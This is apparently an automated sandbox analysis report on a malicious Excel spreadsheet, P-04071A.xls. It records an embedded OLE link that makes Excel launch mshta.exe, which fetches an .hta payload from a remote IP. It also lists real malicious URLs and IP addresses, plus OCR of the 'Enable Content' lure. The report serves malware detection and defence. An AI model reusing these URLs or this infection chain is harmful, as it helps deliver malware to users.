Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
P-04071A.xls

Overview

General Information

Sample name:P-04071A.xls
Analysis ID:1590669
MD5:f12222b43b91b68aa3dcbcf168e7c78b
SHA1:4dd717a9449f8241434022fbcded4de68f36ea7c
SHA256:8fe9724cf6b6ab32348aaedaa20646f6cbdce0aa09ed317a635602acfb603f0c
Tags:xlsuser-lowmal3
Infos:

Detection

Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Machine Learning detection for sample
Sigma detected: Suspicious Microsoft Office Child Process
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Document misses a certain OLE stream usually present in this Microsoft Office document type
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Excel Network Connections
Sigma detected: Suspicious Office Outbound Connections
Uses a known web browser user agent for HTTP communication

Classification

  • System is w10x64
  • EXCEL.EXE (PID: 7732 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: 4A871771235598812032C822E6F68F19)
    • mshta.exe (PID: 7336 cmdline: C:\Windows\SysWOW64\mshta.exe -Embedding MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • splwow64.exe (PID: 1012 cmdline: C:\Windows\splwow64.exe 12288 MD5: 77DE7761B037061C7C112FD3C5B91E73)
  • EXCEL.EXE (PID: 7876 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\P-04071A.xls" MD5: 4A871771235598812032C822E6F68F19)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Windows\SysWOW64\mshta.exe -Embedding, CommandLine: C:\Windows\SysWOW64\mshta.exe -Embedding, CommandLine|base64offset|contains: Iyb, Image: C:\Windows\SysWOW64\mshta.exe, NewProcessName: C:\Windows\SysWOW64\mshta.exe, OriginalFileName: C:\Windows\SysWOW64\mshta.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, ParentProcessId: 7732, ParentProcessName: EXCEL.EXE, ProcessCommandLine: C:\Windows\SysWOW64\mshta.exe -Embedding, ProcessId: 7336, ProcessName: mshta.exe
Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 14.103.79.10, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 7732, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49773
Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.4, DestinationIsIpv6: false, DestinationPort: 49773, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 7732, Protocol: tcp, SourceIp: 14.103.79.10, SourceIsIpv6: false, SourcePort: 443
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: P-04071A.xlsAvira: detected
Source: P-04071A.xlsVirustotal: Detection: 26%Perma Link
Source: P-04071A.xlsReversingLabs: Detection: 34%
Source: P-04071A.xlsJoe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
Source: unknownHTTPS traffic detected: 14.103.79.10:443 -> 192.168.2.4:49773 version: TLS 1.2

Software Vulnerabilities

barindex
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\mshta.exe
Source: global trafficDNS query: name: s.deemos.com
Source: global trafficTCP traffic: 192.168.2.4:49773 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.4:49787 -> 131.226.2.34:80
Source: global trafficTCP traffic: 192.168.2.4:49773 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.4:49773 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.4:49773 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.4:49773 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.4:49773 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.4:49773 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.4:49773 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.4:49773 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.4:49773 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.4:49773 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.4:49773 -> 14.103.79.10:443
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.4:49773
Source: global trafficTCP traffic: 192.168.2.4:49773 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.4:49773 -> 14.103.79.10:443
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.4:49773
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.4:49773
Source: global trafficTCP traffic: 192.168.2.4:49773 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.4:49773 -> 14.103.79.10:443
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.4:49773
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.4:49773
Source: global trafficTCP traffic: 192.168.2.4:49773 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.4:49773 -> 14.103.79.10:443
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.4:49773
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.4:49773
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.4:49773
Source: global trafficTCP traffic: 192.168.2.4:49773 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.4:49773 -> 14.103.79.10:443
Source: global trafficTCP traffic: 192.168.2.4:49773 -> 14.103.79.10:443
Source: global trafficTCP traffic: 14.103.79.10:443 -> 192.168.2.4:49773
Source: global trafficTCP traffic: 192.168.2.4:49787 -> 131.226.2.34:80
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.4:49787
Source: global trafficTCP traffic: 192.168.2.4:49787 -> 131.226.2.34:80
Source: global trafficTCP traffic: 192.168.2.4:49787 -> 131.226.2.34:80
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.4:49787
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.4:49787
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.4:49787
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.4:49787
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.4:49787
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.4:49787
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.4:49787
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.4:49787
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.4:49787
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.4:49787
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.4:49787
Source: global trafficTCP traffic: 192.168.2.4:49787 -> 131.226.2.34:80
Source: global trafficTCP traffic: 192.168.2.4:49787 -> 131.226.2.34:80
Source: global trafficTCP traffic: 192.168.2.4:49787 -> 131.226.2.34:80
Source: global trafficTCP traffic: 192.168.2.4:49787 -> 131.226.2.34:80
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.4:49787
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.4:49787
Source: global trafficTCP traffic: 192.168.2.4:49787 -> 131.226.2.34:80
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.4:49787
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.4:49787
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.4:49787
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.4:49787
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.4:49787
Source: global trafficTCP traffic: 192.168.2.4:49787 -> 131.226.2.34:80
Source: global trafficTCP traffic: 192.168.2.4:49787 -> 131.226.2.34:80
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.4:49787
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.4:49787
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.4:49787
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.4:49787
Source: global trafficTCP traffic: 192.168.2.4:49787 -> 131.226.2.34:80
Source: global trafficTCP traffic: 192.168.2.4:49787 -> 131.226.2.34:80
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.4:49787
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.4:49787
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.4:49787
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.4:49787
Source: global trafficTCP traffic: 192.168.2.4:49787 -> 131.226.2.34:80
Source: global trafficTCP traffic: 192.168.2.4:49787 -> 131.226.2.34:80
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.4:49787
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.4:49787
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.4:49787
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.4:49787
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.4:49787
Source: global trafficTCP traffic: 192.168.2.4:49787 -> 131.226.2.34:80
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.4:49787
Source: global trafficTCP traffic: 192.168.2.4:49787 -> 131.226.2.34:80
Source: global trafficTCP traffic: 192.168.2.4:49787 -> 131.226.2.34:80
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.4:49787
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.4:49787
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.4:49787
Source: global trafficTCP traffic: 192.168.2.4:49787 -> 131.226.2.34:80
Source: global trafficTCP traffic: 192.168.2.4:49787 -> 131.226.2.34:80
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.4:49787
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.4:49787
Source: global trafficTCP traffic: 192.168.2.4:49787 -> 131.226.2.34:80
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.4:49787
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.4:49787
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.4:49787
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.4:49787
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.4:49787
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.4:49787
Source: global trafficTCP traffic: 131.226.2.34:80 -> 192.168.2.4:49787
Source: global trafficTCP traffic: 192.168.2.4:49787 -> 131.226.2.34:80
Source: global trafficTCP traffic: 192.168.2.4:49787 -> 131.226.2.34:80
Source: global trafficTCP traffic: 192.168.2.4:49787 -> 131.226.2.34:80
Source: global trafficTCP traffic: 192.168.2.4:49787 -> 131.226.2.34:80
Source: excel.exeMemory has grown: Private usage: 2MB later: 97MB
Source: Joe Sandbox ViewIP Address: 14.103.79.10 14.103.79.10
Source: Joe Sandbox ViewJA3 fingerprint: 6271f898ce5be7dd52b0fc260d0662b3
Source: global trafficHTTP traffic detected: GET /liT0QqiQ?&skate=yummy&sack=gigantic&epee=damaged&bookcase HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: s.deemos.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /xampp/meno/me/somenewgirlscameonmylifewithherattitudesonhere.hta HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: 131.226.2.34
Source: unknownTCP traffic detected without corresponding DNS query: 131.226.2.34
Source: unknownTCP traffic detected without corresponding DNS query: 131.226.2.34
Source: unknownTCP traffic detected without corresponding DNS query: 131.226.2.34
Source: unknownTCP traffic detected without corresponding DNS query: 131.226.2.34
Source: unknownTCP traffic detected without corresponding DNS query: 131.226.2.34
Source: unknownTCP traffic detected without corresponding DNS query: 131.226.2.34
Source: unknownTCP traffic detected without corresponding DNS query: 131.226.2.34
Source: unknownTCP traffic detected without corresponding DNS query: 131.226.2.34
Source: unknownTCP traffic detected without corresponding DNS query: 131.226.2.34
Source: unknownTCP traffic detected without corresponding DNS query: 131.226.2.34
Source: unknownTCP traffic detected without corresponding DNS query: 131.226.2.34
Source: unknownTCP traffic detected without corresponding DNS query: 131.226.2.34
Source: unknownTCP traffic detected without corresponding DNS query: 131.226.2.34
Source: unknownTCP traffic detected without corresponding DNS query: 131.226.2.34
Source: unknownTCP traffic detected without corresponding DNS query: 131.226.2.34
Source: unknownTCP traffic detected without corresponding DNS query: 131.226.2.34
Source: unknownTCP traffic detected without corresponding DNS query: 131.226.2.34
Source: unknownTCP traffic detected without corresponding DNS query: 131.226.2.34
Source: unknownTCP traffic detected without corresponding DNS query: 131.226.2.34
Source: unknownTCP traffic detected without corresponding DNS query: 131.226.2.34
Source: unknownTCP traffic detected without corresponding DNS query: 131.226.2.34
Source: unknownTCP traffic detected without corresponding DNS query: 131.226.2.34
Source: unknownTCP traffic detected without corresponding DNS query: 131.226.2.34
Source: unknownTCP traffic detected without corresponding DNS query: 131.226.2.34
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /liT0QqiQ?&skate=yummy&sack=gigantic&epee=damaged&bookcase HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: s.deemos.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /xampp/meno/me/somenewgirlscameonmylifewithherattitudesonhere.hta HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: 131.226.2.34
Source: global trafficDNS traffic detected: DNS query: s.deemos.com
Source: P-04071A.xls, FCE30000.0.drString found in binary or memory: https://s.deemos.com/liT0QqiQ?&skate=yummy&sack=gigantic&epee=damaged&bookcase
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
Source: unknownHTTPS traffic detected: 14.103.79.10:443 -> 192.168.2.4:49773 version: TLS 1.2

System Summary

barindex
Source: screenshotOCR: document is protected If this document was the yellow bar above Once you have enabled please click -
Source: screenshotOCR: Enable Content- from the yellow bar above Mxpxcv Ready & Accessibility: Unavailable NV.T.,'CDU... D
Source: screenshotOCR: document is protected If this dcxument was the dcxument in 2 wa Once you have enabled editing. pleas
Source: screenshotOCR: Enable Content- from the yellow bar atx)ve protected dcxuments the yellow bar above Sheet3 x 100% Re
Source: screenshotOCR: document is protected If this dcxument was the yellow bar above Once you have enabled editing, pleas
Source: screenshotOCR: protected documents This document is protected If this dcxument was the yellow bar above Once you ha
Source: screenshotOCR: Enable Content- from the yellow bar above 2 D y say uepu3LL ule suuuu ue ueu_u e 3_ Shipping NIarks
Source: screenshotOCR: document is protected If this dcxument was the yellow bar above Once you have enabled editing, pleas
Source: screenshotOCR: protected documents This document is protected If this dcxument was the yellow bar above Once you ha
Source: screenshotOCR: Enable Content- from the yellow bar above 2 D y say uepu3LL ule suuuu ue ueu_u e 3_ Shipping NIarks
Source: screenshotOCR: document is protected VsI arri N. O. R tend N.o.R ac 19 VsI d Anchor up PURPOSE OF Tanks ins Initial
Source: screenshotOCR: protected documents This document is protected VsI arri N. O. R tend N.o.R ac 19 VsI d Anchor up PUR
Source: screenshotOCR: Enable Content- from the yellow bar above Loading commenced Loading completed Final calculation star
Source: screenshotOCR: document is protected Open the document in Microsoft Office. previewing online is not available for
Source: screenshotOCR: Enable Content" from Sheetl Sheet2 Sheet3 cargo a Ready o Accessibility: Good to go Loading Loading
Source: screenshotOCR: document is protected Keep an eye on it Anch We will keep track of accessibility issues while you wo
Source: screenshotOCR: Enable Content" from Loading Loading completed Final calculation started Final calculation ended Car
Source: P-04071A.xlsOLE: Microsoft Excel 2007+
Source: P-04071A.xlsOLE: Microsoft Excel 2007+
Source: P-04071A.xlsOLE: Microsoft Excel 2007+
Source: FCE30000.0.drOLE: Microsoft Excel 2007+
Source: FCE30000.0.drOLE: Microsoft Excel 2007+
Source: P-04071A.xlsOLE indicator, VBA macros: true
Source: P-04071A.xlsStream path 'MBD0043A31F/\x1Ole' : https://s.deemos.com/liT0QqiQ?&skate=yummy&sack=gigantic&epee=damaged&bookcase!(KA1ceU dMPk|n9MH"mVFz6*igXQucTwUsVzCcjU+sXN.%APWU-QRy1XLf8p`IGw)kAzC"nTn
Source: FCE30000.0.drStream path 'MBD0043A31F/\x1Ole' : https://s.deemos.com/liT0QqiQ?&skate=yummy&sack=gigantic&epee=damaged&bookcase!(KA1ceU dMPk|n9MH"mVFz6*igXQucTwUsVzCcjU+sXN.%APWU-QRy1XLf8p`IGw)kAzC"nTn
Source: ~DF173D381B94141C75.TMP.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: classification engineClassification label: mal80.expl.winXLS@6/9@1/2
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\Desktop\FCE30000Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{6C206254-F642-40A9-8AEA-412D3FDCBA53} - OProcSessId.datJump to behavior
Source: P-04071A.xlsOLE indicator, Workbook stream: true
Source: FCE30000.0.drOLE indicator, Workbook stream: true
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: P-04071A.xlsVirustotal: Detection: 26%
Source: P-04071A.xlsReversingLabs: Detection: 34%
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\mshta.exe -Embedding
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\P-04071A.xls"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\mshta.exe -EmbeddingJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: c2r32.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEAutomated click: OK
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEAutomated click: OK
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEAutomated click: OK
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
Source: P-04071A.xlsStatic file information: File size 1275392 > 1048576
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
Source: ~DF173D381B94141C75.TMP.0.drInitial sample: OLE indicators vbamacros = False
Source: P-04071A.xlsInitial sample: OLE indicators encrypted = True
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
